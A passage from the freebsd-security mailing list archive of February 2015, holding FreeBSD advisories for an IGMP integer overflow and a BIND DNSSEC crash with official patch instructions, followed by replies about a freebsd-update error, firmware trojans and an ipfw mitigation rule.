CVE-2015-1414 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit . I. Background IGMP is a control plane protocol used by IPv4 hosts and routers to propagate multicast group membership information. IGMP version 3 is implemented on FreeBSD. II. Problem Description An integer overflow in computing the size of IGMPv3 data buffer can result in a buffer which is too small for the requested operation. III. Impact An attacker who can send specifically crafted IGMP packets could cause a denial of service situation by causing the kernel to crash. IV. Workaround Block incoming IGMP packets by protecting your host/networks with a firewall. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-15:04/igmp.patch # fetch https://security.FreeBSD.org/patches/SA-15:04/igmp.patch.asc # gpg --verify igmp.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - ------------------------------------------------------------------------- stable/8/ r279263 releng/8.4/ r279265 stable/9/ r279263 releng/9.3/ r279265 stable/10/ r279263 releng/10.0/ r279264 releng/10.1/ r279264 - ------------------------------------------------------------------------- To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed: # svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NNNNNN with the revision number: VII. References The latest revision of this advisory is available at -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.1.1 (FreeBSD) iQIcBAEBCgAGBQJU7WjDAAoJEO1n7NZdz2rnjr8QAL0J0+4lRtPXRyDRX2xFSnzw sc3OpfmlTiD3pCFkebTYy3/+EK86iAL1ZELqlJe5mm2+pzhCQB13C4/exc0l1U6b tyiGXxhVi2/4SBrs6n9lmB/YhXkgtqaOQAcNaOD6sVbS1e5cBtjnG86oOq8tQ2qG c7Dvh3HTp9M5fDJtsI40SIpqy3FcKORBfpjYd8jONfSqMnLM2kM8xzwHSv4/X23e GlDKHtIi+1ylD/Qu7Z3S7hqXDTSYjZb1QHc7axDFB6X6nj2Rz3aWS2hPPTypFd3T zTj5DZjgiP7U2LhR40sWW68RYi21yzNUwbe0w5LeDah6Ymc5CDO2ujdm3HDQbQGH pA9QIOjzpgR64nWLIJfZ7jMxL3rCCaCW3NCB/iRXni2Ib/wt3ZDkJyEk/SF4K82H 72U2u2qVjAsnhmwWK8gksBi9bEXk3TnX778bkrwm4rt1xOjACq8k66LAernoE4tB DkE0pO4QR+6XwFb5sJMG/3L9CmrhTp2pkPDBQDbSD+ngBs5V5mJOqVf7gB+UptnN Fh8OACO/5KtDkqBDsCljHxHZNaboVF4Q613+iF5CUc6SYOTkLnBDUE4Pq38vlzVB GdZMEo/hvsCbR4c2TmdKuvEkEqayxCxcv0DXiyTlVCecxSkaYvMXPwCKK43QtS7S het83QCUxaVuxLiznuwR =lkYC -----END PGP SIGNATURE----- From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 06:29:28 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 765D3AB6; Wed, 25 Feb 2015 06:29:28 +0000 (UTC) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:1900:2254:206c::16:87]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 592B0C57; Wed, 25 Feb 2015 06:29:28 +0000 (UTC) Received: from freefall.freebsd.org (localhost [127.0.0.1]) by freefall.freebsd.org (8.14.9/8.14.9) with ESMTP id t1P6TSMd007904; Wed, 25 Feb 2015 06:29:28 GMT (envelope-from security-advisories@freebsd.org) Received: (from delphij@localhost) by freefall.freebsd.org (8.14.9/8.14.9/Submit) id t1P6TSid007902; Wed, 25 Feb 2015 06:29:28 GMT (envelope-from security-advisories@freebsd.org) Date: Wed, 25 Feb 2015 06:29:28 GMT Message-Id: <201502250629.t1P6TSid007902@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: delphij set sender to security-advisories@freebsd.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory FreeBSD-SA-15:05.bind Reply-To: freebsd-security@freebsd.org Precedence: bulk X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 25 Feb 2015 06:29:28 -0000 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ============================================================================= FreeBSD-SA-15:05.bind Security Advisory The FreeBSD Project Topic: BIND remote denial of service vulnerability Category: contrib Module: bind Announced: 2015-02-25 Credits: ISC Affects: FreeBSD 8.x and FreeBSD 9.x. Corrected: 2015-02-18 22:20:19 UTC (stable/9, 9.3-STABLE) 2015-02-25 05:56:54 UTC (releng/9.3, 9.3-RELEASE-p10) 2015-02-18 22:29:52 UTC (stable/8, 8.4-STABLE) 2015-02-25 05:56:54 UTC (releng/8.4, 8.4-RELEASE-p24) CVE Name: CVE-2015-1349 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit . I. Background BIND 9 is an implementation of the Domain Name System (DNS) protocols. The named(8) daemon is an Internet Domain Name Server. II. Problem Description BIND servers which are configured to perform DNSSEC validation and which are using managed keys (which occurs implicitly when using "dnssec-validation auto;" or "dnssec-lookaside auto;") may exhibit unpredictable behavior due to the use of an improperly initialized variable. III. Impact A remote attacker can trigger a crash of a name server that is configured to use managed keys under specific and limited circumstances. However, the complexity of the attack is very high unless the attacker has a specific network relationship to the BIND server which is targeted. IV. Workaround Only systems that runs BIND, including recursive resolvers and authoritative servers that performs DNSSEC validation and using managed-keys are affected. This issue can be worked around by not using "auto" for the dnssec-validation or dnssec-lookaside options and do not configure a managed-keys statement. Note that in order to do DNSSEC validation with this workaround one would have to configure an explicit trusted-keys statement with the appropriate keys. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-15:05/bind.patch # fetch https://security.FreeBSD.org/patches/SA-15:05/bind.patch.asc # gpg --verify bind.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system using buildworld and installworld as described in . Restart the applicable daemons, or reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - ------------------------------------------------------------------------- stable/8/ r278973 releng/8.4/ r279265 stable/9/ r278972 releng/9.3/ r279265 - ------------------------------------------------------------------------- To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed: # svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NNNNNN with the revision number: VII. References The latest revision of this advisory is available at -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.1.1 (FreeBSD) iQIcBAEBCgAGBQJU7WjDAAoJEO1n7NZdz2rnKkgP/3vUBO8o5ofQFMUYSS1siPxZ 63OeeRlMabEgiWZaQ+V2O7/CPrHDIgJHQABx9kNoiutWD9TC3c5f7Yh4nfaXmbKe Ncu3EjF1Zw/uGbu3cXjboX0CYnBDYrPNJnzIvSG0UlTY5hEIi3FgN4v2Q3gzuU/2 3aUlFHyZb4GVzK+lA+wD0unOc6+il6LHPpSzwRbLpNxCB2J582HoCuw9i5NfMiOB KP8axZeNZLMpE90s3H/VD+7UIoe6eOC0kykH/DpuUIUxxlExK9c8f9QurpoCnOrV qwPAeWEYjmjZmMFivVZf5ugir6diaenfPjpXvUGNz2pCp5wlRkku71sMDsgnErX2 Fnuc6nCXqTb/XX6zQmz/236EEVr2UBuX0cXWT0Dvu8GznMij/s4J+9+/Pkjp/mr7 PfXj4H9UMv2Q3zOW7+Vb2Ru0zwfL9Dt90SyNbvt6DOA9KSNnUZIkN/pbKuS9fnHX Pw7eiNPs4Rq0Ui1DJDWVsJnZV2aVSw+qHxeMVtjCWbx3O7IVGgj5W7i95iAPHRJ4 PVd1oaI2WsteoLNGpfXUD5sQr9yFRU/mRKtgSjxtKRV/nIkdwfTNcHHXIl0XuIWw C7VmAjlZgqj7aacTZWiVXqiFkN6gDjjFv1lVYmuDQOiK52JCbcBavYnxzZxVzuSa yIpDuhJS5vIt/B5oepoZ =uquT -----END PGP SIGNATURE----- From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 07:36:42 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [8.8.178.115]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 93287563; Wed, 25 Feb 2015 07:36:42 +0000 (UTC) Received: from mail-qa0-x231.google.com (mail-qa0-x231.google.com [IPv6:2607:f8b0:400d:c00::231]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 2C5A88C0; Wed, 25 Feb 2015 07:36:39 +0000 (UTC) Received: by mail-qa0-f49.google.com with SMTP id w8so1510517qac.8; Tue, 24 Feb 2015 23:36:38 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:sender:in-reply-to:references:date:message-id:subject :from:to:cc:content-type; bh=hlaIsTkpj8MRCQLLMVeTwRr/G9IFsBKTJH2KkHvvbiQ=; b=iBofMAqIvgH+SYKnmTN7C+n+blqb7bcHXzBmV+lh3lh7oWns3T3S6q4kluqSqAOVOP amlUwUZN6AHYtBxzKoxH2EtEE5x7kWmocjXmnw6cJUuN7NEoJKJ2RnTz25wsnZUvcHHX Wbk3eByXu/Q5FjOCEYIl8/wg9iAz1GfACMeK3GygyaaZxgjatLYxZSa7d+6G2Q3f3K8v Fb63lkP8FQoISp4fVLtYg+fL5OSsb28rlJkhjXaNvfxWfweq+bVaadnrZ54e0RYzgbVy 0I+1m52A9ahiFRFILzJAiwtAc5l2ogDLMv7KXER++mbiPpmdsyNiTYi4SxSNngxhZEWv WCJQ== MIME-Version: 1.0 X-Received: by 10.140.41.169 with SMTP id z38mr4115958qgz.56.1424849798264; Tue, 24 Feb 2015 23:36:38 -0800 (PST) Sender: spankthespam@gmail.com Received: by 10.229.131.204 with HTTP; Tue, 24 Feb 2015 23:36:38 -0800 (PST) In-Reply-To: <201502250629.t1P6TSid007902@freefall.freebsd.org> References: <201502250629.t1P6TSid007902@freefall.freebsd.org> Date: Wed, 25 Feb 2015 07:36:38 +0000 X-Google-Sender-Auth: zrn-dH3SAy-dFqSeJiYZ1DrQE2s Message-ID: Subject: Re: FreeBSD Security Advisory FreeBSD-SA-15:05.bind From: Bartek Rutkowski To: freebsd-security Content-Type: text/plain; charset=UTF-8 Cc: so@freebsd.org X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 25 Feb 2015 07:36:42 -0000 On Wed, Feb 25, 2015 at 6:29 AM, FreeBSD Security Advisories wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA512 > > ============================================================================= > FreeBSD-SA-15:05.bind Security Advisory > The FreeBSD Project > > Topic: BIND remote denial of service vulnerability > > Category: contrib > Module: bind > Announced: 2015-02-25 > Credits: ISC > Affects: FreeBSD 8.x and FreeBSD 9.x. > Corrected: 2015-02-18 22:20:19 UTC (stable/9, 9.3-STABLE) > 2015-02-25 05:56:54 UTC (releng/9.3, 9.3-RELEASE-p10) > 2015-02-18 22:29:52 UTC (stable/8, 8.4-STABLE) > 2015-02-25 05:56:54 UTC (releng/8.4, 8.4-RELEASE-p24) > CVE Name: CVE-2015-1349 > > For general information regarding FreeBSD Security Advisories, > including descriptions of the fields above, security branches, and the > following sections, please visit . > > I. Background > > BIND 9 is an implementation of the Domain Name System (DNS) protocols. > The named(8) daemon is an Internet Domain Name Server. > > II. Problem Description > > BIND servers which are configured to perform DNSSEC validation and which > are using managed keys (which occurs implicitly when using > "dnssec-validation auto;" or "dnssec-lookaside auto;") may exhibit > unpredictable behavior due to the use of an improperly initialized > variable. > > III. Impact > > A remote attacker can trigger a crash of a name server that is configured > to use managed keys under specific and limited circumstances. However, > the complexity of the attack is very high unless the attacker has a > specific network relationship to the BIND server which is targeted. > > IV. Workaround > > Only systems that runs BIND, including recursive resolvers and authoritative > servers that performs DNSSEC validation and using managed-keys are affected. > > This issue can be worked around by not using "auto" for the dnssec-validation > or dnssec-lookaside options and do not configure a managed-keys statement. > Note that in order to do DNSSEC validation with this workaround one would > have to configure an explicit trusted-keys statement with the appropriate > keys. > > V. Solution > > Perform one of the following: > > 1) Upgrade your vulnerable system to a supported FreeBSD stable or > release / security branch (releng) dated after the correction date. > > 2) To update your vulnerable system via a binary patch: > > Systems running a RELEASE version of FreeBSD on the i386 or amd64 > platforms can be updated via the freebsd-update(8) utility: > > # freebsd-update fetch > # freebsd-update install > Seems like freebsd-update is throwing some error: root@04-dev:~ # freebsd-update install Installing updates...install: ///usr/src/crypto/openssl/util/mkbuildinf.pl: No such file or directory done. root@04-dev:~ # uname -a FreeBSD 04-dev 10.1-RELEASE-p5 FreeBSD 10.1-RELEASE-p5 #0: Tue Jan 27 08:55:07 UTC 2015 root@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC amd64 Anything to worry about? Kind regards, Bartek Rutkowski From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 07:40:45 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id BBABB79A; Wed, 25 Feb 2015 07:40:45 +0000 (UTC) Received: from anubis.delphij.net (anubis.delphij.net [64.62.153.212]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client CN "anubis.delphij.net", Issuer "StartCom Class 1 Primary Intermediate Server CA" (not verified)) by mx1.freebsd.org (Postfix) with ESMTPS id 9B3D8902; Wed, 25 Feb 2015 07:40:45 +0000 (UTC) Received: from Xins-MBP.home.us.delphij.net (c-71-202-112-39.hsd1.ca.comcast.net [71.202.112.39]) (using TLSv1 with cipher ECDHE-RSA-AES256-SHA (256/256 bits)) (Client did not present a certificate) by anubis.delphij.net (Postfix) with ESMTPSA id B56502628B; Tue, 24 Feb 2015 23:40:44 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=delphij.net; s=anubis; t=1424850044; x=1424864444; bh=8dci0Va7CC+VHg4m8ev2yT/pDU0v9t6ZMLhxkmMnkKQ=; h=Date:From:To:CC:Subject:References:In-Reply-To; b=pTGVBTVmNbHRWX9QTGFbWhrOBgvI14cBgAwelZ7asnbvy/R+3kiFBvCRMFXjuX30W E6awNopnCQnUO9MwILqtgx4rJqwo3c4+UPMFmAXBmCGoF7lNOnl1M8ZM1AvUbytGeg kppkw4cdO+JHJmOF39yf56dP/A3U5atPaSwxIFXk= Message-ID: <54ED7C7C.3070202@delphij.net> Date: Tue, 24 Feb 2015 23:40:44 -0800 From: Xin Li User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:31.0) Gecko/20100101 Thunderbird/31.4.0 MIME-Version: 1.0 To: Bartek Rutkowski , freebsd-security Subject: Re: FreeBSD Security Advisory FreeBSD-SA-15:05.bind References: <201502250629.t1P6TSid007902@freefall.freebsd.org> In-Reply-To: Content-Type: text/plain; charset=windows-1252 Content-Transfer-Encoding: 7bit Cc: so@freebsd.org X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 25 Feb 2015 07:40:45 -0000 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 2/24/15 23:36, Bartek Rutkowski wrote: > Seems like freebsd-update is throwing some error: > > root@04-dev:~ # freebsd-update install Installing > updates...install: ///usr/src/crypto/openssl/util/mkbuildinf.pl: No > such file or directory done. root@04-dev:~ # uname -a FreeBSD > 04-dev 10.1-RELEASE-p5 FreeBSD 10.1-RELEASE-p5 #0: Tue Jan 27 > 08:55:07 UTC 2015 > root@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC > amd64 > > Anything to worry about? No. This is a known issue with freebsd-update, which is confused by added (source) files. For the purpose of patching your system there is nothing to worry about. Cheers, -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJU7Xx5AAoJEJW2GBstM+nsKeoP/1c4we+N2ScknNevUdzhWOA8 WpbPiWdMCtUexjvriLTEJJT3kBSEsA+RTZQKNu7JIRwwLlP+l2+hDt2bgBgnW4nZ Zwa4MnlrLoi2Rxq8vuE4lObasWyhCLR6F168Yc/Nu49YU42NE6Q8X6+u+t8u1SO6 n2KGRQarl4IP66mxrwDlm2C+V3SHNrguykIJJuJJuWY303/SpD9gcUtnVW8RZgdd rP97aKrARfKAuU251ZuZxu8zt0ZN6ktXtDbMRm3LbcsuY3dilzqAqfXec9g+wZGA nJxra/MxFPg5H0ftfBgvWCwqwkDf2bO7qTlybKXvWDHoQjTScfS1maPD+QOOLnQZ d9Si5X/GZZ1akGPQD9AG58kZnoeDd6L1SbzMVttF9PlYHVzAu6QXFPZcnh0MIqpi v/z0Zy0FxOapkKuQ8uF8ym67HXFJ6jppFsZCmI6nE/qc+R1ZsEziTsSa+12V0ROu xTK90sSnRVc2WkyLbv4t97wrG3NzudVvz3p0UKWt63DmPEDOVRJZEAvL1T8QnaSS 4NFXfxOEwWyQl01ok4PRnOIuvCDqot3m6Fx2rkBBpSpn23mHqD/w/tjKliCdz9t3 8ocFVmAufZE4RoD+iiljMpy3JkL20hkGr89ravIo0EARtpBMp93Qb6l7albmoaip ym9UvBaiTqoP6oYF+kIV =JJYM -----END PGP SIGNATURE----- From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 10:42:11 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id DE260D93; Wed, 25 Feb 2015 10:42:10 +0000 (UTC) Received: from mail-ob0-x22b.google.com (mail-ob0-x22b.google.com [IPv6:2607:f8b0:4003:c01::22b]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id A9800AA; Wed, 25 Feb 2015 10:42:10 +0000 (UTC) Received: by mail-ob0-f171.google.com with SMTP id gq1so2960225obb.2; Wed, 25 Feb 2015 02:42:09 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :cc:content-type; bh=QPmc1r7ZmHvDdnhmhJmADgYUeFb/JLG/OtTtnnHCzxc=; b=yKiD00tkhLeBZyd677tegYNWMQnWLsm1ydzM5INCcV67Tb3QNdCtPDPpVL8k3PurzO JbPw/3CMGMNatv9E/N11cwvbanfbF0lwyvPHoFoMNvANU4/ROk2nvd0hYdWEt8ko2BsO MCOmg0MF12fNG0IQhyHuW6vvl3P/lehlY3NdwRMvHEj/s7Q+fiwz//v4o+bApPH67vOK o6LNiqynEGQzQxYQ/VmY/CvEQbrRy3wUUQNQOyagiWLfJYY9qZTodWKXZsfCMcVIotTT NVntHaY/V6f99a4hXHVYCMyG5XI4Vv5J2KD+sdvnJlOKmw9eNHm/+A9zLs7HFqvx4lft znMQ== MIME-Version: 1.0 X-Received: by 10.202.77.75 with SMTP id a72mr1604476oib.49.1424860929574; Wed, 25 Feb 2015 02:42:09 -0800 (PST) Received: by 10.60.140.199 with HTTP; Wed, 25 Feb 2015 02:42:09 -0800 (PST) In-Reply-To: <591A0ED4-FEE7-4190-9836-15E151D01B80@lrw.com> References: <591A0ED4-FEE7-4190-9836-15E151D01B80@lrw.com> Date: Wed, 25 Feb 2015 05:42:09 -0500 Message-ID: Subject: Re: [Cryptography] trojans in the firmware From: grarpamp To: freebsd-questions@freebsd.org Content-Type: text/plain; charset=UTF-8 Cc: cypherpunks@cpunks.org, freebsd-security@freebsd.org X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 25 Feb 2015 10:42:11 -0000 On Tue, Feb 24, 2015 at 10:48 AM, Kay Rydyger wrote: > > The question was [... firmware spies] > The answer is [...] to encrypt data. No, reading bits from platters or the bus is a partial analysis of the whole firmware question. It's already been suggested in links how firmware can hook the users unencrypted boot binaries through to the users kernel. For that matter, a modified boot chain could be stored in the service area. A user would have to use SecureBoot, TPM, IOMMU, TXT, GELI and perhaps other things, all of them properly, having no holes, together, right now, at least three of which they are unlikely to have ubiquitous access to until a couple hardware generations or personal refresh cycles into the future. An ideal full solution for which is yet to come. Not to mention needing to install it all cleanly (from BTW, an install image which has no reproducible build and no cryptographic chain back to the insecure unsigned source repo anyways). But yeah, let's talk circular instead of about possible actually coding defense in depth such as maybe blocking the most common easiest path a malicious opcode will likely take to irrepairably infect clean hardware in the first place... through the drivers ... > There is no threat to freebsd ... because at least Unix is said to be immune to threat... http://www.freebsd.org/security/advisories.html http://www.openbsd.org/errata56.html http://web.nvd.nist.gov/view/vuln/search-results?query=linux+kernel&search_type=last3years&cves=on > Weaknesses of this measure are remote and highly costly for the > attacker. If one is such a person of interest It's already been talked how this tech will be integrated into everyday run of the mill malware. And how users will be subject to infected drives via second purchase, inheritance (both from other people and from other operating systems), use of hosting services, trading, booting CD's, etc. Persistant malware in users boot chains is nasty, users don't have to be of interest or be targeted, the code doesn't care, grandma's surfbox could get it. Please learn to email... trim the original to the minimum needed for context, reply inline below, and stop copying 400 line digests with meaningless digest subject lines out to everyone on the list. On whenever, someone else wrote: > Since the chip holding the firmware has > leads through which it is loaded with the firmware, > is it not possible to disable or burn (with laser) or cut > just the leads through which the chip is WRITTEN to > (in order to re-program it)? Depends on the design. The hacking links or docs from the drive/chip vendors would be more helpful there. From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 11:24:23 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [8.8.178.115]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id C3CCC950 for ; Wed, 25 Feb 2015 11:24:23 +0000 (UTC) Received: from mail.tdx.com (mail.tdx.com [62.13.128.18]) by mx1.freebsd.org (Postfix) with ESMTP id 8E71980B for ; Wed, 25 Feb 2015 11:24:23 +0000 (UTC) Received: from [10.12.30.106] (vpn01-01.tdx.co.uk [62.13.130.213]) (authenticated bits=0) by mail.tdx.com (8.14.3/8.14.3/) with ESMTP id t1PBOFuE010406 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO) for ; Wed, 25 Feb 2015 11:24:15 GMT Date: Wed, 25 Feb 2015 11:24:16 +0000 From: Karl Pielorz To: freebsd-security@freebsd.org Subject: FreeBSD Security Advisory FreeBSD-SA-15:04.igmp (fwd) - ipfw fix? Message-ID: X-Mailer: Mulberry/4.0.8 (Win32) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 25 Feb 2015 11:24:23 -0000 Hi, Presumably if you don't need IGMP, ipfw can be used to mitigate this on hosts until they're patched / rebooted, i.e. ipfw add x deny igmp from any to any ? Thanks, -Karl ---------- Forwarded Message ---------- Date: 25 February 2015 06:29 +0000 From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory FreeBSD-SA-15:04.igmp -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 =========================================================================== == FreeBSD-SA-15:04.igmp Security Advisory The FreeBSD Project Topic: Integer overflow in IGMP protocol From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 12:47:22 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [8.8.178.115]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 4547EFD6; Wed, 25 Feb 2015 12:47:22 +0000 (UTC) Received: from zxy.spb.ru (zxy.spb.ru [195.70.199.98]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id EF57314E; Wed, 25 Feb 2015 12:47:21 +0000 (UTC) Received: from slw by zxy.spb.ru with local (Exim 4.84 (FreeBSD)) (envelope-from ) id 1YQbMs-000IXQ-TF; Wed, 25 Feb 2015 15:47:10 +0300 Date: Wed, 25 Feb 2015 15:47:10 +0300 From: Slawa Olhovchenkov To: Xin Li Subject: Re: FreeBSD Security Advisory FreeBSD-SA-15:05.bind Message-ID: <20150225124710.GA70915@zxy.spb.ru> References: <201502250629.t1P6TSid007902@freefall.freebsd.org> <54ED7C7C.3070202@delphij.net> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <54ED7C7C.3070202@delphij.net> User-Agent: Mutt/1.5.23 (2014-03-12) X-SA-Exim-Connect-IP: X-SA-Exim-Mail-From: slw@zxy.spb.ru X-SA-Exim-Scanned: No (on zxy.spb.ru); SAEximRunCond expanded to false Cc: freebsd-security , Bartek Rutkowski , so@freebsd.org X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 25 Feb 2015 12:47:22 -0000 On Tue, Feb 24, 2015 at 11:40:44PM -0800, Xin Li wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA512 > > > > On 2/24/15 23:36, Bartek Rutkowski wrote: > > Seems like freebsd-update is throwing some error: > > > > root@04-dev:~ # freebsd-update install Installing > > updates...install: ///usr/src/crypto/openssl/util/mkbuildinf.pl: No > > such file or directory done. root@04-dev:~ # uname -a FreeBSD > > 04-dev 10.1-RELEASE-p5 FreeBSD 10.1-RELEASE-p5 #0: Tue Jan 27 > > 08:55:07 UTC 2015 > > root@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC > > amd64 > > > > Anything to worry about? > > No. > > This is a known issue with freebsd-update, which is confused by added > (source) files. Do you planed to fix it? From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 17:22:14 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 48AD7999 for ; Wed, 25 Feb 2015 17:22:14 +0000 (UTC) Received: from mail.jr-hosting.nl (mail.jr-hosting.nl [IPv6:2a01:4f8:210:34e4::25]) by mx1.freebsd.org (Postfix) with ESMTP id CD76F91A for ; Wed, 25 Feb 2015 17:22:13 +0000 (UTC) Received: from [10.0.2.17] (a44084.upc-a.chello.nl [62.163.44.84]) (using TLSv1 with cipher ECDHE-RSA-AES256-SHA (256/256 bits)) (Client did not present a certificate) by mail.jr-hosting.nl (Postfix) with ESMTPSA id 6AF1529B5; Wed, 25 Feb 2015 18:21:57 +0100 (CET) DMARC-Filter: OpenDMARC Filter v1.3.0 mail.jr-hosting.nl 6AF1529B5 Authentication-Results: mail.jr-hosting.nl/6AF1529B5; dmarc=none header.from=FreeBSD.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-15:04.igmp (fwd) - ipfw fix? Mime-Version: 1.0 (Mac OS X Mail 8.2 \(2070.6\)) Content-Type: multipart/signed; 